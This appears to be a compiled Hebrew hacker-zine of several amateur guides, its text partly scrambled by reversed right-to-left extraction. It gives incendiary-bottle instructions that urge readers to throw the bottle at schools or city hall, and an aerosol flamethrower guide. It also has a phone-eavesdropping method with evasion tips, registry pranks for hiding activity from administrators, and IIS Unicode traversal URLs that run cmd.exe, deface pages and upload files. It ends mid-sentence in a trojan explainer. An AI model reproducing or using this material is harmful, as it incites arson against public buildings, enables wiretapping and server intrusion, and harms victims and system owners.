‫‪:‬חומרים‬
‫(‪..‬א‪ -‬בקבוק זכוכית‪( ...‬מומלץ של בירה כדי שיהיה מה לשתות לפני‬

‫‪...‬ב‪ -‬מפית נייר פשוטה‬
‫‪...‬ג‪ -‬בקבוק של אלכוהול‬
‫‪...‬ד‪ -‬זריזות‬
‫‪:‬אופן הביצוע‬
‫‪!!!...‬שתו את כל הבירה ואל תנקו את הבקבוק‬

‫(‪...‬אחרי זה שימו הרבה הרבה הרבה אלכוהול בפנים (אפשר עד החצי‪ ..‬הכי טוב‬
‫(‪...‬ומפית נייר‪( ...‬שחלק מהמפית יהיה בחוץ‬
‫‪...‬שרפו את הקצה של המפית‪ ...‬וזרקו את הגפרור‬
‫‪.‬לתוך הבקבוק‬
‫‪...‬החלק היפה‬
‫‪..‬עכשיו זרקו את הבקבוק ממש מהר‬

‫‪:‬ושתיי דברים אולי יקרו‬
‫‪...‬הוא יתפוץ באוויר להרבה הרבה רסיסים מהחום ‪1-‬‬
‫‪...‬הוא ישרוף כל דבר שהוא יגע בוא ‪2-‬‬
‫‪..‬בכל מקרה זה ס‪22‬ה לזרוק את זה בתוך הבית ספר היסודי שלכם‬

‫‪...‬או בבית ספר הנוכחי שלכם‬
‫‪..‬או סתם ליד בניין העיריה‬

‫‪...‬בכל אופן אני סומך עליכם שתהנו‬
‫‪by zebra‬‬
‫איך לבנות לביור‪flame machine‬‬
‫‪“the girl is mine” - micheal jackson‬‬
‫‪ ...‬מה שלומכם ? אצלי הכל טוב‬
‫‪ ...‬השיטה היא ישנה ומוכרת‪ ,‬כתבתי את הטקסט כדי להבהיר כמה נקודות שוב‬
‫‪ :‬חומרים‬
‫‪ ( .‬ספריי ( כמו ביום העצמאות ‪ -‬המזויפים הם הכי טובים ‪1.‬‬

‫מצית ( אפשר קטנה אבל עדיף את המצית הענקית שפעם לפני שהיו תנורים חשמליים השתמשו ‪2.‬‬
‫‪(.‬במטבח ‪ -‬אפשר להשיג בקו‪-‬אופ ( פעם שיחקתי עם זה בסופר והאבטחה בא עלי ‪ -‬להוריד פרופיל‬
‫‪ ): .‬אומץ ‪ -‬אני לא אחרי אם נשרף לחברה שלכם השער ‪3.‬‬
‫‪ ...‬שיטה א ‪ -‬עובדת עם ספריי בלחץ נמוך‬
‫להתחיל להשפריץ ספריי לקרב בעדינות את המצית והכל מתחיל להיות חם ‪ ...‬שרוף ‪ ...‬אש ‪- ...‬‬
‫‪.‬כלומר ברגע זה יש לכם לביור‪ -‬עם לביור זה אפשר לשרוף דשא‪ ,‬שוטר ואפילו את בן‪-‬לאדן השובב‬
‫שיטה ב ‪ -‬עובדת תמיד‬
‫לסיים את הבקבוק ולדאוג שהבקבוק ישפריץ אוויר‪ ,‬לקרב את המצית בשיא הזהירות לאוויר והינה‬
‫יש לכם לביור‪ .‬יש להזהר נורא בשיטה זאת משום שאנשים טועים וחושבים שהאוויר הזה לא יביא‬
‫‪ ): .‬ללהבה גדולה אבל ‪ ...‬תנסו ותראו‬
‫? מה לעשות עם הלבן של הספריי כשהוא על הרצפה‬
‫אפשר להדליק אותו‪ ,‬הוא דליק נורא ‪ .‬אני ממליץ לעשות קו ארוך של ספריי ולהדליק ‪( ...‬בסוף הקו‬
‫‪ ( .‬אפשר להניח כמה נפצים ‪ ...‬או איזה טיל טומהוק (‪ :‬ואז יהיה לכם מצב רוח פ‪33‬ות‬
‫‪by efraim abramov \ old-hacker‬‬

‫‪windows tricks part 1‬‬
‫המדריך הזה יספר לך כיצד תוכל לשנות מלא דברים במערכת הפעלה ה"מהוללת" ‪windows -‬‬
‫באמצעות עורך הרג'יסטרי (רישום המערכת)‪ ,‬וכמו כן גם טיפים וטריקים שונים בנוגע לדברים‬
‫שיכולים לעזור לך בשעה שאתה משתמש במערכת ההפעלה הזאת (שלדעתי שווה לזב‪)...‬‬
‫(לא אין הכוונה לפיצוח סיסמת ‪ windows‬אם חשבת במקרה שהמדריך עוסק בכך‪)...‬‬
‫השקעתי הרבה שעות בכתיבת המדריך הזה ואני מקווה שתהנה ממנו כמו שאני נהניתי לכתוב אותו‪.‬‬
‫חלק מהדברים פה נכתבו למשתמשים מתחילים מאוד וחלק למשתמשים מתקדמים אני מקווה‬
‫שתפיקו ממנו את הרוב‪.‬‬
‫המדריך נכתב מחומר שאספתי מאתרים שונים בנוגע לכך במשך השנים האחרונות וגם מידע אישי‬
‫שלי לכן אל תופתע אם תראה דברים באתרים אחרים שכבר ראית פה‪.‬‬
‫לכל מי שמתכנת בשפות תכנות (לדוגמת ‪ , ) vb‬שינסה להפעיל חלק מהשיטות המוצעות פה דרך‬
‫תוכנית מסוימת שתפעיל את הרג'יסטרי ‪ .‬זה יכול להיות תרגול נחמד בהחלט‪ ,‬מי יודע אולי מתישהו‬
‫אני יכין תוכנית כזאת‪...‬‬
‫אזהרה‪ :‬מדריך זה יכול לפגוע קשות במערכת ההפעלה ו \ או לגרום לפעילות בלתי חוקית‪ ,‬הוא נכתב‬
‫למטרות לימודיות בלבד ולכן אם אתה מתכוון להשתמש בו זה על אחריותך הפרטית בלבד אני לא‬
‫לוקח אחריות לכל דבר שתעשה בשימוש במדריך זה בכל אופן שהוא חוקי או לא חוקי!!‬
‫ידע נדרש‪:‬‬
‫‪-‬עדיף שתדע להשתמש קצת בעורך הרג'יסטרי שלך (‪ ) regedit.exe‬שנמצא תחת תיקיית ‪ win98‬או‬
‫‪ windows‬וניתן להפעלה אם תלחץ על "התחל" = < הפעלה =< ותכתוב ‪ , regedit‬ההפעלה שלו די‬
‫מזכירה את ה"סייר" של המחשב‪ -‬אז תלמד להשתמש גם בו ‪ ,‬דבר פשוט בהחלט‪ .‬וכמו כן גם כדאי‬
‫שיהיה לך ידע כללי בתכנות רק בשביל שתבין בערך מה אתה עושה‪.‬‬
‫כל המידע נכתב למערכת ‪ windows 98/95‬בעברית אך הוא מתאים גם לגרסה האנגלית!‬
‫זכור לגבות \ לזכור כל שינוי שאתה עושה כדי שתוכל להשיב את המצב לקדמותו!‬
‫הכפתור הימני של העכבר באינטרנט אקספלורר‬

‫תגיד ‪ ,‬אתה לא שונא שיש אתרים מעצבנים קרציות שלא נותנים לך ללחוץ על הכפתור הימני של‬
‫העכבר באמצעות סקריפט‪ ,‬ובכן אל תתעצבן‪.‬‬
‫אם אתה מגיע לאתר כזה פשוט עמוד במקום שבו אתה רוצה ללחוץ על הלחצן הימני ולחץ על הכפתור‬
‫שמתחת לכפתור ‪( shift‬כן זה עם הציור של העכבר)‪ .‬איזה יופי ‪ ,‬הלחצן הימני עובד‪.‬‬
‫משתמשים עם עכבר בעל לחצן אמצעי פשוט יכולים להתעלות על הסקריפט באמצעות לחיצה רצופה‬
‫על הלחצן האמצעי ולאחר מכן לחיצה על הלחצן הימני‪.‬‬
‫כמובן שאפשר להתעלם פשוט מהג'אווה באתר באמצעות ‪ intenet explorer‬ע"י‬

‫כלים > אפשרויות אינטרנט > אבטחה > רמה מותאמת אישית‬
‫ושנה שם כך ששום סקריפט ‪ jave‬או ‪ java script‬יפעל‪ ,‬פשוט מאוד‪...‬‬
‫הפסקת הפעלה אוטומטית של ה ‪cd‬‬

‫נכון שה ‪ cd rom‬שלך מפעיל קבצים אוטומטית ? רוצה להפסיק את זה?‬
‫ובכן גש לעורך הרג'יסטרי שלך והכנס לתיקייה הבאה‪:‬‬
‫‪hkey_currect_user\sofware\microsoft\windows\currectversion\policies\explorer‬‬
‫שנה את הערך שנמצא ב ‪ nodrivetypeautorun‬ל ‪:‬‬

‫‪bd 00 00 00‬‬
‫עכשיו הדיסק לא יפעל בצורה אוטומטית (כנראה שתצטרף להפעיל את המחשב מחדש כדי שהשינוי‬
‫יתרחש) ‪ .‬ד"כ לצורך הגיבוי ברוב המערכות המידע ששינית ממנו היה‬
‫‪00 00 00 95‬‬
‫יצירת תצוגה ממוזערת של קבצי ‪bmp‬‬

‫הנה טריק נחמד ולא מזיק במיוחד ‪ .‬נכון ש ‪ icons‬אתה רואה כמו שהם ‪ -‬מה שאתה רואה זה‬
‫האייקון ‪ ,‬אז כך גם אפשר לעשות לקבצי ‪ - bmp‬איך ?‬
‫לך לעורך הרג'יסטרי והכנס ל‪:‬‬
‫‪hkey_currect_root\paint.picture\defaulticon‬‬
‫ושנה את הערך שנמצא ב תווית ‪ default‬ל ‪%1‬‬
‫אישית אני חושב שזה טריק נחמד במיוחד‪.‬‬
‫תפריטי טורבו‬
‫את זה אני בטוח שתאהב‪ ,‬תלחץ על "התחל" ועכשיו על "תוכניות" נגיד‪ ...‬התפריטים עלים במהירות‬
‫איטית ומעצבנת ‪ -‬בוא תהפוך אותם למהירות טורבו ‪:‬‬
‫הכנס לעורך הרג'יסטרי והכנס ל‪:‬‬
‫‪hkey_currect_user\control panel\ desktop‬‬
‫בתוך ‪ desktop‬הכן מפתח ‪ string value‬חדש (ע"י לחיצה על מקש ימני בתוך החלון הימני‬
‫ובחירת ‪ - ) string value‬וכתוב בשם שלו (לא הערך ! ) ‪menushowdelay‬‬
‫בתוכו שים את הערך ‪ 10‬או ערך נמוך מזה (כל ערך שווה למספר מיליוניות השנייה שהמחשב יחכה עד‬
‫שהוא יפתח את התפריט הבא) ע"י לחיצה כפולה על התווית שיצרת‪ ..‬התחל את המחשב ובפעם הבאה‬
‫שתכנס לתפריט הוא יטוס לך‪...‬‬
‫שינוי הכותרת בחלון ‪internet explorer‬‬

‫אם תפעיל את הדפדפן ‪ explorer‬תראה שכתוב בכותרת ‪ microsoft internet explorer‬ניתן‬
‫לשנות זאת ע"י כך ‪:‬‬
‫הכנס לעורך רג'יסטרי בתיקייה ‪:‬‬
‫‪hkey_local_machine\software\microsoft\internet explorer\main‬‬
‫פתח ‪ string value‬חדש וקרא לו בשם ‪ window title‬בתוכו שים את הטקסט אותו אתה רוצה‬
‫שיופיע‪.‬‬
‫לשנות את כפתור "התחל" והאייקון שלו (למתקדמים)‬

‫זה די מסובך למתחילים ‪ ,‬אם אין לך ידע בבסיסים הקסדצימליים אז תלמד קצת כי המדריך הזה‬
‫דורש ידע כזה (ניתן למצוא במדריכים שלי) ‪.‬‬
‫אני חושב שלשנות את הכפתור של "‪ "start‬זה דבר מאוד נחמד‪ .‬יאללה בוא נתחיל‪:‬‬
‫לשנות את הכיתוב‪:‬‬
‫גבה את ‪ explorer.exe‬מתיקיית ‪windows‬‬
‫לאחר שגיבית אותו בתיקייה מסוימת (שאותה תדע למצוא דרך ‪ dos‬אם הוא ילך לך חס וחלילה)‬
‫פתח לו את הצורה באמצעות עורך הקסדצימלי כלשהוא‪ .‬לך לכתובת ‪hex‬‬
‫‪02df0e‬‬
‫שם תראה את זה‪74 00 72 0 61 00 74 00 53 :‬‬
‫שזה אומר ‪( srart‬תרגום לאסקי) וכל ספרת ה ‪ 00‬מציינים רווח בין האותיות (רווח תיאורטי‬
‫במערכת ההפעלה אין רווח בין האותיות!) ‪ .‬שנה את הערכים לאיזה אותיות שאתה רוצה‪( ...‬בהתאם‬
‫להמרת ה ‪ ascii‬לבסיס הקסדצימלי‪.‬‬
‫עובד במערכת אנגלית ‪ ,‬אין לי מושג איך זה בעברית‪...‬‬
‫לשנות את האייקון‪:‬‬
‫גבה את ‪ user.exe‬מתיקיית ‪windows‬‬
‫עכשיו לך לעורך אייקונים כלשהו שיכול לקרוא ‪ exe‬ופתח בו את הקובץ ‪ ,‬שנה אותו למה שתרצה‪.‬‬
‫משהו חשוב גודל האייקון צריך להתאים לגודל המסך ‪ -‬תנסה לשחק עם זה קצת‪...‬‬
‫להעיף מיקומי תוכניות מ "הוספה \ הסרה"‬
‫אתה עושה ‪ uninstall‬למשחק \ תוכנה אבל כנראה שאתה אוטיסט ולא עשית את זה כמו שצריך ‪):‬‬
‫כנקמה על כך (חחח) ‪ windows‬תקעה לך את התווית של זה בלוח הבקרה בתוך הוספה\ הסרה ‪.‬‬
‫רוצה להעיף את זה ? אין בעיה‪...‬‬
‫לך ל‪:‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\uninstall‬‬
‫ומחק כל מיקום לא רצוי‪.‬‬
‫תפריט "שלח אל"‬

‫טוב אני לא מחדש שום דבר‪ ...‬נכון שאתה לוחץ על הלחצן הימני במקום כלשהו יש לך תפריט שנקרא‬
‫"שלח אל" או באנגלית ‪... sendto‬‬
‫בשביל לשנות את המקומות שבפנים למה שבא לך לתיקייה ‪ sendto‬בספריית המערכת ‪windows‬‬
‫ושנה את מה שאתה רוצה ‪ -‬התיקייה יכולה להיות גם מוסתרת‬
‫שינוי שם "סל המחזור"‬

‫רוצה לקרוא לסל המחזור איך שבא לך ‪" -‬פח זבל" ‪" ,‬אח שלי" ומה שאתה רוצה‪...‬‬
‫לך ברג'יסטרי ל‪:‬‬
‫‪}hkey_classes_root\clsid\{645ff040-5081-101b-9f08-00aa002f954e‬‬
‫ושנה את השם שמופיע ב ‪default‬‬
‫מסכי פתיחה \ סגירה של המחשב‬

‫טוב תזהר עם השטות הזאת כי היא הורסת לפעמים את הגרפיקה של ההתחלה‪...‬‬
‫בתיקיית ‪ windows‬שלך ישנם קבצים שאתה יכול לפתוח עם "צייר" ולשנות אותם למה שאתה‬
‫רוצה‪ ...‬אל תשכח לגבות לפני! (הקבצים יכולים להיות גם מוסתרים)‬
‫‪ - logo.sys‬מסך הפתיחה של המחשב‬
‫‪ - logos.sys‬מסך "כעת בטוח לכבות את המחשב"‬
‫‪ - logow.sys‬מסך הכיבוי של המחשב‬
‫צור עותקים לתפריטים מקומיים‬

‫דבר אדיר ‪ ,‬שכל משתמש צריך לדעת ובזה אני סוגר את הטיפים למדריך זה‪ (...‬מה כבר נגמר ?! אבל‬
‫היה כזה נחמד ‪ ...‬אווווו‪).....‬‬
‫צור תיקייה חדשה וקרא לה כך‪:‬‬

‫}‪control panel.{21ec2020-3aea-1069-a2dd-08002b30309d‬‬
‫הופה הופה ! מה אני רואה כאן‪ ...‬היא נראית בדיוק כמו "לוח הבקרה" ‪...‬עשה אתה מה שאתה רוצה‬
‫כעת‪...‬‬
‫אותו דבר ניתן לעשות גם לדברים אחרים כדוגמת ‪:‬‬

‫חיוג לרשת ‪:‬‬
‫}‪dial up net.{992cffa0-f557-101a-88ec-00dd010ccc48‬‬
‫‪:‬מדפסות‬
‫}‪printers.{2227a280-3aea-1069-a2de-08002b30309d‬‬
‫סיכום‪:‬‬
‫במדריך זה למדת כמה טריקים נחמדים למערכת ההפעלה שיכולים לייעל את השימוש שלך בה‪.‬‬
‫כמובן שאם אתה לא יודע איך להשתמש בטריקים הרסת לעצמך את המערכת כמה פעמים ‪):‬‬
‫מקווה שנהנית‬
‫‪zeos‬‬
‫‪windows tricks part 2‬‬
‫‪,‬הממ אני שמח שאתם קוראים את זה‪ ,‬כי זה מדריך עם שטויות בוינדוס להריץ על חברים‬
‫‪.‬שהם מעצבנים אתכם‪ ,‬ליימרים‪ ,‬וכאלה שכיף לעשות להם באסה בלב‬
‫‪.‬כיבוי מהיר‪ ,‬בלי בקשות ובלה בלה ‪1.‬‬

‫‪.‬פשוט פקודה שמכבה את המחשב‬
‫‪c:\windows\rundll.exe user.exe,exitwindowsexec‬‬
‫‪.‬לבטל את אפשרות הכיבוי מתפריט התחלה ‪2.‬‬

‫‪hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫מחפשים‬
‫‪noclose key‬‬
‫אם הוא לא נמצא תיצרו‬
‫ע"י‬
‫(‪new > string value.)name it noclosekey‬‬
‫‪.‬עכשיו‪ ,‬שימו לו ערך ‪ .1‬כאשר ערך ‪ 1‬פעיל אז הוא האפשרות כיבוי מבוטלת‬
‫? רוצים לעשות את זה יותר מהר‬
‫פיתחו קובץ חדש עם סיומת‪reg‬‬
‫‪++‬‬
‫]‪[hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫”‪"noclose"="1‬‬
‫‪++‬‬
‫‪.‬והפעילו אותו כמובן‬
‫‪.‬למחוק את הטיפים של הוינדוס כדי לחסוך כמה קילו בייטים מסכנים ‪3.‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\explorer\tips‬‬
‫‪.‬פשוט בחרו את הטיפים ומחקו אותם ע"י מקש מחיקה‬
‫למחוק תפריטים מסוימים בתפריט התחל ‪4.‬‬
‫לדוגמה ‪run‬‬
‫הולכים ל‬
‫‪regedit‬‬
‫‪hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫‪new > dword‬‬
‫‪name > norun value > 1‬‬
‫כמו כן‪nofind‬‬
‫‪.‬הלך גם קיצור הדרך להגיע לשם דרך המקשים של המקלדת‬
‫‪.‬כדי להחזיר למצב מה עושים‪ ,‬שמים לדבר החדש שעשיתם ערך ‪ 0‬או מוחקים אותו‬
‫‪ .‬בשביל האקרים)‪ .‬ביטול ההצגה של המתחבר האחרון לרשת בוינדוס נ‪.‬ט ‪5. )5‬‬
‫‪hkey_local_machine\software\microsoft\windowsnt\currentversion\winlogon‬‬
‫‪name > reportbookok value > 1‬‬
‫‪.‬כדי לבטל מוחקים אותו או שמים ערך ‪0‬‬
‫‪.‬זה טוב כדי שהאדמין לא ידע אם אתם התחברתם אחרונים ועשיתם משהו לא טוב ברשת ‪--‬‬
‫‪.‬הממ אני לא בטוח שזה עובד בגיסראות החדשות של נ‪.‬ט‪ 6 .‬אבל תנסו ‪.‬‬
‫‪. .‬ביטול מסך בדיקת סיסמא בהפעלת הוינדוס נ‪.‬ט‬
‫פוצחים קובץ‪reg‬‬
‫‪disable.reg‬‬
‫‪----‬‬
‫]‪[hkey_local_machine\software\microsoft\windows\currentversion\policies\network‬‬
‫‪"disablepwdcaching"=dword:00000001‬‬
‫‪----‬‬
‫‪by zeos‬‬
‫תיקונים ‪efraim abramov -‬‬
‫‪wap - wireless application protocol.‬‬
‫? מה במדריך זה‬
‫? ‪ wap‬מהו *‬
‫!! ‪ - wap‬רשימת הפלאפונים על פרוטוקול ה *‬
‫!?? איך אפשר לנצל את זה *‬
‫!! איך להיזהר לא להיתפס *‬
‫!! מושגים קשורים לנושא *‬
‫!! קרדיטים *‬
‫? ‪ wap‬מהו‬
‫=========‬
‫‪ - wireless application protocol.‬הוא ‪ wap‬ראשי התיבות של‬
‫‪.‬הוא בעצם פרוטוקול תקשורת אשר נותן למכשירי פלאפון מידע כמו קו דיגיטלי ולא אנלוגי‬
‫רשת אנלוגית היא רשת פשוטה אשר לא מתוחכמת כמו שהטכנולוגיה עכשיו &‬
‫‪.‬רשת דיגיטלית הרבה יותר מתקדמת ויש בה הרבה יותר ישומים אפשריים &&‬
‫‪.‬משמש מכשיר פלאפון רגילים וגם טרמינלים של רשת פלאפון כלשהי ‪-wap‬ה‬
‫‪.‬הוא גם משמש לישומי אינטרנט אפשריים &&&‬
‫‪ - mmm.‬אמור להיות עליהם לוגו כזה ‪- wap‬כל המכשירים אשר כוללים את ה‬
‫‪.‬ומידע את הלקוח שהמכשיר שלו פועל בפרוטוקול הנ"ל ‪mmm - mobile media mode.‬‬
‫! ‪ - wap‬רשימת הפלאפונים על פרוטוקול ה‬

‫=====================================‬
‫‪ wap :‬הנה רשימה של מכשירים אשר עובדים על‬
‫‪alcatel onetouch‬‬
‫‪benefon q wap+html‬‬
‫‪benefon twin dual sim‬‬
‫‪ericsson r320‬‬
‫‪ericsson r380‬‬
‫‪mitsubishi trium geo wap‬‬
‫‪motorola timeport l7389‬‬
‫‪motorola v2288‬‬
‫(‪motorola talkabout )t2288‬‬
‫‪nokia 6210‬‬
‫‪nokia 6250‬‬
‫‪nokia 7110‬‬
‫‪panasonic gd 93‬‬
‫‪siemens s35i‬‬
‫‪siemens m35i‬‬
‫‪siemens c35i‬‬
‫‪sony cmd-z5‬‬
‫‪.‬והנה רשימה של פלאפונים ממש ממוחשבים כמו מין פלאפון שהוא גם מחשב אישי‬
‫‪ericsson mc218‬‬
‫‪nokia 9110 communicator‬‬
‫‪siemens ic35‬‬
‫? איך אפשר לנצל את זה‬

‫=====================‬
‫‪.‬אפשר לצוטט למכשירים הנ"ל מפלאפון אחר אשר תומך בפרוטוקול‬

‫‪:‬דוגמא‬
‫? ממכשיר אריקסון אפשר לצוטט למספרי טלפון אחרים‪ ,‬מה הבעיה פה‬
‫‪.‬שאתה לא יכול לבחור מספר שאתה רוצה ואתה לא יכול להצטרף לשיחה כצד שלישי‬
‫? איך עושים את זה‬
‫‪:‬אתה לוקח את המכשיר שלך ועושה ככה‬
‫‪904059, menu, yes, 1, rcl, yes, 8300**, yes, 86.‬‬
‫‪.‬במקום שתי הכוכביות אתה יכול שים את כל סדרי הספרות חוץ מ ‪00‬‬
‫‪(.‬אם אני לא טועה) ‪ : rcl, 3, yes‬כדי לצאת מהמצב הזה אתה עושה‬
‫‪.‬אתה תשמע מישהו מדבר אתה לא תוכל לעשות כלום כדי להפריע לו או משהו כזה‬
‫‪'.‬אולי יהיה לך מזל ותשמע שיחה מהנה או שיחה שמועברים בה נתונים אישיים או חסויים וכו‬
‫! איך להיזהר לא להיתפס‬

‫======================‬
‫‪,‬החוק הכי חשוב לא לעשות את זה כל שניה ושניה ואלף חמש מאות פעמים ביום ‪1.‬‬
‫‪.‬פעם בכמה זמן אם משעמם לכם‬
‫‪.‬על תישארו על הקו יותר מחמישים שניות בפעם אחת‪,‬בציתות אחד אני מתכוון ‪2.‬‬
‫‪, u‬אל תדברו בקול על זה שאתם מצותתים וכו' בחוץ כי אם איזה שוטר סמוי ישמע אותכם ‪3.‬‬
‫‪busted.‬‬
‫‪,‬תנסו כמה שיותר לא לעשות את זה מהמכשיר שלכם או ממכשיר של קרוב משפחה ‪4.‬‬
‫‪,‬כי אם עולים עליכם עד שהם ירעענו נתונים ויבואו לקחת את מי שעה את זה‬
‫‪.‬הם לא יגיעו אליך אלא אל מי שעשיתם את זה ממנו‬
‫‪.‬לא להיתפס ‪5.‬‬
‫!!! מושגים קשורים לנושא‬

‫=======================‬
‫‪ )wap(.‬שפת טקסט של רשת אלחוטית במיוחד לפרוטוקול זה ‪wml:‬‬
‫‪.‬שפת טקסט דיגיטלית ‪htm:‬‬
‫‪.‬מערכת טלפונים אשר תוספים לה סרביסס למיניהם ‪televas:‬‬
‫!!! קרדיטים‬
‫===========‬
‫‪.‬קודם כל תודה למשפחתי האהובה שנתנה לי את הסיכוי לכתוב טקסט זה‬
‫‪'.‬אחרי זה אני מודה לאלוהים על כך שנתן לי ידיים‪ ,‬רגליים וכו‬
‫‪.‬חחח סתם סתם‬
‫‪ - phonel0v3r.‬יש פה קרדיט לחבר ותיק שלי‪ ,‬פריקר כבר הרבה זמן‬
‫‪ www.astalavista.com.‬תודה מיוחדת לו על שעזר לי בכתיבת מדריך זה‪ .‬ולאתר‬
‫תיקונים ‪efraim abramov -‬‬
‫פריצה לאתרים בעזרת יוניקוד‬
‫מבוא‬
‫יוניקוד הוא באג שנמצא ב‪ iis 4.0/5.0‬שהם שרתי ה ‪ web‬של ‪ winnt/win2k‬הבאג מאפשר לתוקף‬
‫להפעיל פקודות דוס מרחוק‪.‬‬
‫קצת היסטוריה‬
‫לפני כמה שנים (בתקופה שאני ישבתי ב ‪ bbs‬והורדתי משחקים של ילדים אינפנטילים התגלה ב ‪iis‬‬
‫‪ 3.0‬ונראה לי גם ב ‪ 2.0‬באג שניקרא ‪double dot‬‬
‫הוא נתן לאנשים לראות איזה ספריות שם רוצים פשוט על ידי‬
‫זה שהם רשמו משהו כזה‪:‬‬
‫‪www.someserver.com/..\..‬‬
‫מיקרוסופט שיחררה פאטצ אבל עקפו אותו בקלוט על ידיד זה שתרגמו את ה‬

‫לכתב של הדפדפן ‪..‬‬
‫אתם בתח שואלים למה אני מספר לכם את זה ‪ .‬ובכן למי שלא ידע יוניקוד זה בכלל פורמט לכתיבת‬
‫טקסט ‪ .‬ולמי שעדיין לא מבין יוניקוד הוא גילגול חדש (ושונה קצת) של הדאבל דות שבו מתרגמים‬
‫‪.‬את ה ‪ /‬לתבנית יוניקוד‬
‫‪.‬יוניקוד תומך בשפות שונות זה טיפה מסבך את הניצול של הבאג אבל בזה אני אדון בהמשך‬
‫מציאת שרת ‪iss‬מתאים‬

‫כדי לבדוק אם שרת מסויים הוא‬
‫‪iss4.0/5.0‬‬
‫עליך לעשות טלנט לפורט ‪ 80‬ולרשום שם‬
‫‪head /‬‬
‫ואז ללחוץ פעמיים אנטר אם זה‬

‫‪iss‬‬
‫זה ירשום כזה דבר‬
‫‪http/1.1 501 not supported‬‬
‫‪server: microsoft-iis/4.0‬‬
‫‪date: fri, 16 mar 2001 15:30:36 gmt‬‬
‫‪content-type: text/html‬‬
‫‪content-length: 121‬‬
‫אתם שמים לב ל‬
‫‪iss/4.0‬‬
‫?‬
‫אם לא אז אתם עוורים‬
‫הניצול (‪)exploit‬‬
‫טוב נתחיל עם הניצול הפשוט ואחרי זה נפרק אותו‬
‫אחרי שמצאתה שרת מתאים אתה יכול לפתוח חלון באקספלורייר ולרשום את הדבר הבא‬
‫\‪http://www.servername.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫טוב‬
‫‪servername‬‬
‫די מסביר את עצמו‬
‫נעבור לדבר הבא‬
‫‪scripts‬‬
‫זאת הספריה שבה השרת מאכסן את ה‬
‫‪cgi‬‬
‫שלו במקום סקריפטס יכולים לבוא הדברים הבאים‬
‫‪sampels‬‬
‫‪cgi-bin‬‬
‫‪_vti _admin‬‬
‫‪_vti _bin‬‬
‫‪msadc‬‬
‫‪..%c1%9c..‬‬
‫זה התרגום של יוניקוד בגלל שני קוד תומך בהרבה שפות יש גם המון תרגומים שונים שיכולים לעבוד‬
‫במקומו‬
‫הינה רשימה קטנה‬
‫‪..%c1%1c..‬‬
‫‪..%c0%9v..‬‬
‫‪..%c0%af..‬‬
‫‪..%c0%qf..‬‬
‫‪..%c1%8s..‬‬
‫‪..%c1%9c..‬‬
‫‪..%c1%pc..‬‬
‫‪/winnt/system32/cmd.exe?/‬‬
‫החלק הזה צריך להיות קבוע הוא מוביל אותך אל קובץ‬
‫‪cmd.exe‬‬
‫שהוא הקובץ שמפעיל קובצי‬
‫‪*.bat and *.cmd‬‬
‫שהם קבצים שמכילים אוסף של פקודות בדוס שאותם‬
‫‪cmd.exe‬‬
‫מריץ אחת אחרי השניה‬
‫**********************************************************‬
‫טיפ‪ :‬למי שרוצה לדעת עוד קצת על זה יכול למצוא ב‬
‫‪blacksun.box.sk‬‬
‫מדריך על‬
‫‪batch programming‬‬
‫***********************************************************‬
‫‪/c‬‬
‫זה אות הכונן שיושב עליו האתר זה עלול להישתנות‬
‫ועכשיו לקטע המעניין‬

‫\‪+dir+c:‬‬
‫זאת בעצם פקודה בדוס שמראה את התוכן של‬

‫\‪c:‬‬
‫ה ‪ +‬משמש להפריד בין פרמטרים שונים במקום רווח‬
‫יש עוד די הרבה פקודות אבל יש שתיים שאני רוצה להיתעכב עליהם‬
‫הראשונה היא‬
‫‪echo‬‬
‫בשימוש נכון הפקודה הזאת יכולה להכניס טקסט לקבצים וליצור קבצים‬
‫‪( :‬אבל כשמנסים לעשות את הדבר הבא (שאמור להכניס טקסט לקובץ‬
http://victim.machine/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+dfaced+>>+
c:\inetpub\wwwroot\default.asp
‫זה לא פועל‬
‫מה שצריך לעשות זה להעתיק בעזרת‬
copy
‫את‬
cmd.exe
‫ל‬
c:\inetpub\scripts
‫ואז יהיה אפשר לעשות את זה על ידי‬
http://www.hackmel.co.il/scripts/cmd.exe?/c+echo+blablabla+>>+c:\test.txt
‫הפקודה השניה שאני רוצה להסביר עליה היא‬

ftp
‫אם אתם רוצים להעלות קובץ אתם צריכים ליצור בעזרת‬
echo
‫קובץ שמכיל את כל הפקודות אפ טי פי שאתם רוצים להשתמש בהם ואז להפעיל את הפקודה‬
www.serv.com//scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ftp+-s+c:\commands.txt
by y0g1-b3ar
‫"המדריך המקיף על ה‪"-‬טרוייני‬
‫‪.‬ועכשיו בואו נתחיל‬
‫טרויינים הם בעצם קבצים שמטרתם לפתוח שרת על המחשב שלכם ולהפעיל שרת זה כל פעם‬
‫‪.‬שמחשבכם עולה‬
‫?איך זה בעצם פועל‬

‫(‪ *.exe‬ברגע שאתה פותח את הקובץ שנשלח אליך (בד"כ‬
‫על פורט מסויים שמתכנת הטרוייני קבע ]‪[server‬נפתח אצלך במחשב שרת‬
‫ואתה בד"כ לא יודע מזה‪ ..‬כי הטרויינים בנויים ככה שלא תדע שאתה נדבקת בהם‬
‫‪..‬למשל‪ ..‬אתה תפתח את הקובץ של הטרוייני ויפעל לך משחק קטנטן ואתה לא תחשוד בכלום‬
‫אבל בעצם באותו זמן יותחל הטרוייני על המחשב‬
‫או שלמשל תקבל הודעת שגיאה כאילו היה בעיה עם הקובץ ובעצם ברגע זה נדבקת בטרוייני אכזרי‬
‫‪..‬ויש גם כאלה שברגע שאתה לוחץ עליהם‪ ..‬ולכאורה שום דבר לא קורה‬
‫אבל ברגע זה כבר אתה נגוע בטרוייני והילד ששלח לך את הקובץ כבר בתוך המחשב שלך מוריד ממך‬
‫קבצים‬
‫מתאים‪ ..‬יכול להכניס את האי פי שלך בתור ]‪[client‬ואחרי שנדבקת בטרוייני‪ ..‬כל מי שיש לו לקוח‬
‫שרת‪ ..‬את הפורט של השרת ולהתחבר אליך למחשב‬
‫‪:‬ובעזרת פקודות שהאיש שתכנת את הטרוייני קבע אפשר לעשות לך הרבה דברים‪ ,‬כמו‬
‫‪,‬גניבת סיסמאות‪ ,‬כניסה לסיפריות‪ ,‬כיבוי מחשב‪ ,‬לראות סיסמאות‪ ,‬לראות תמונות של המסך שלך‬
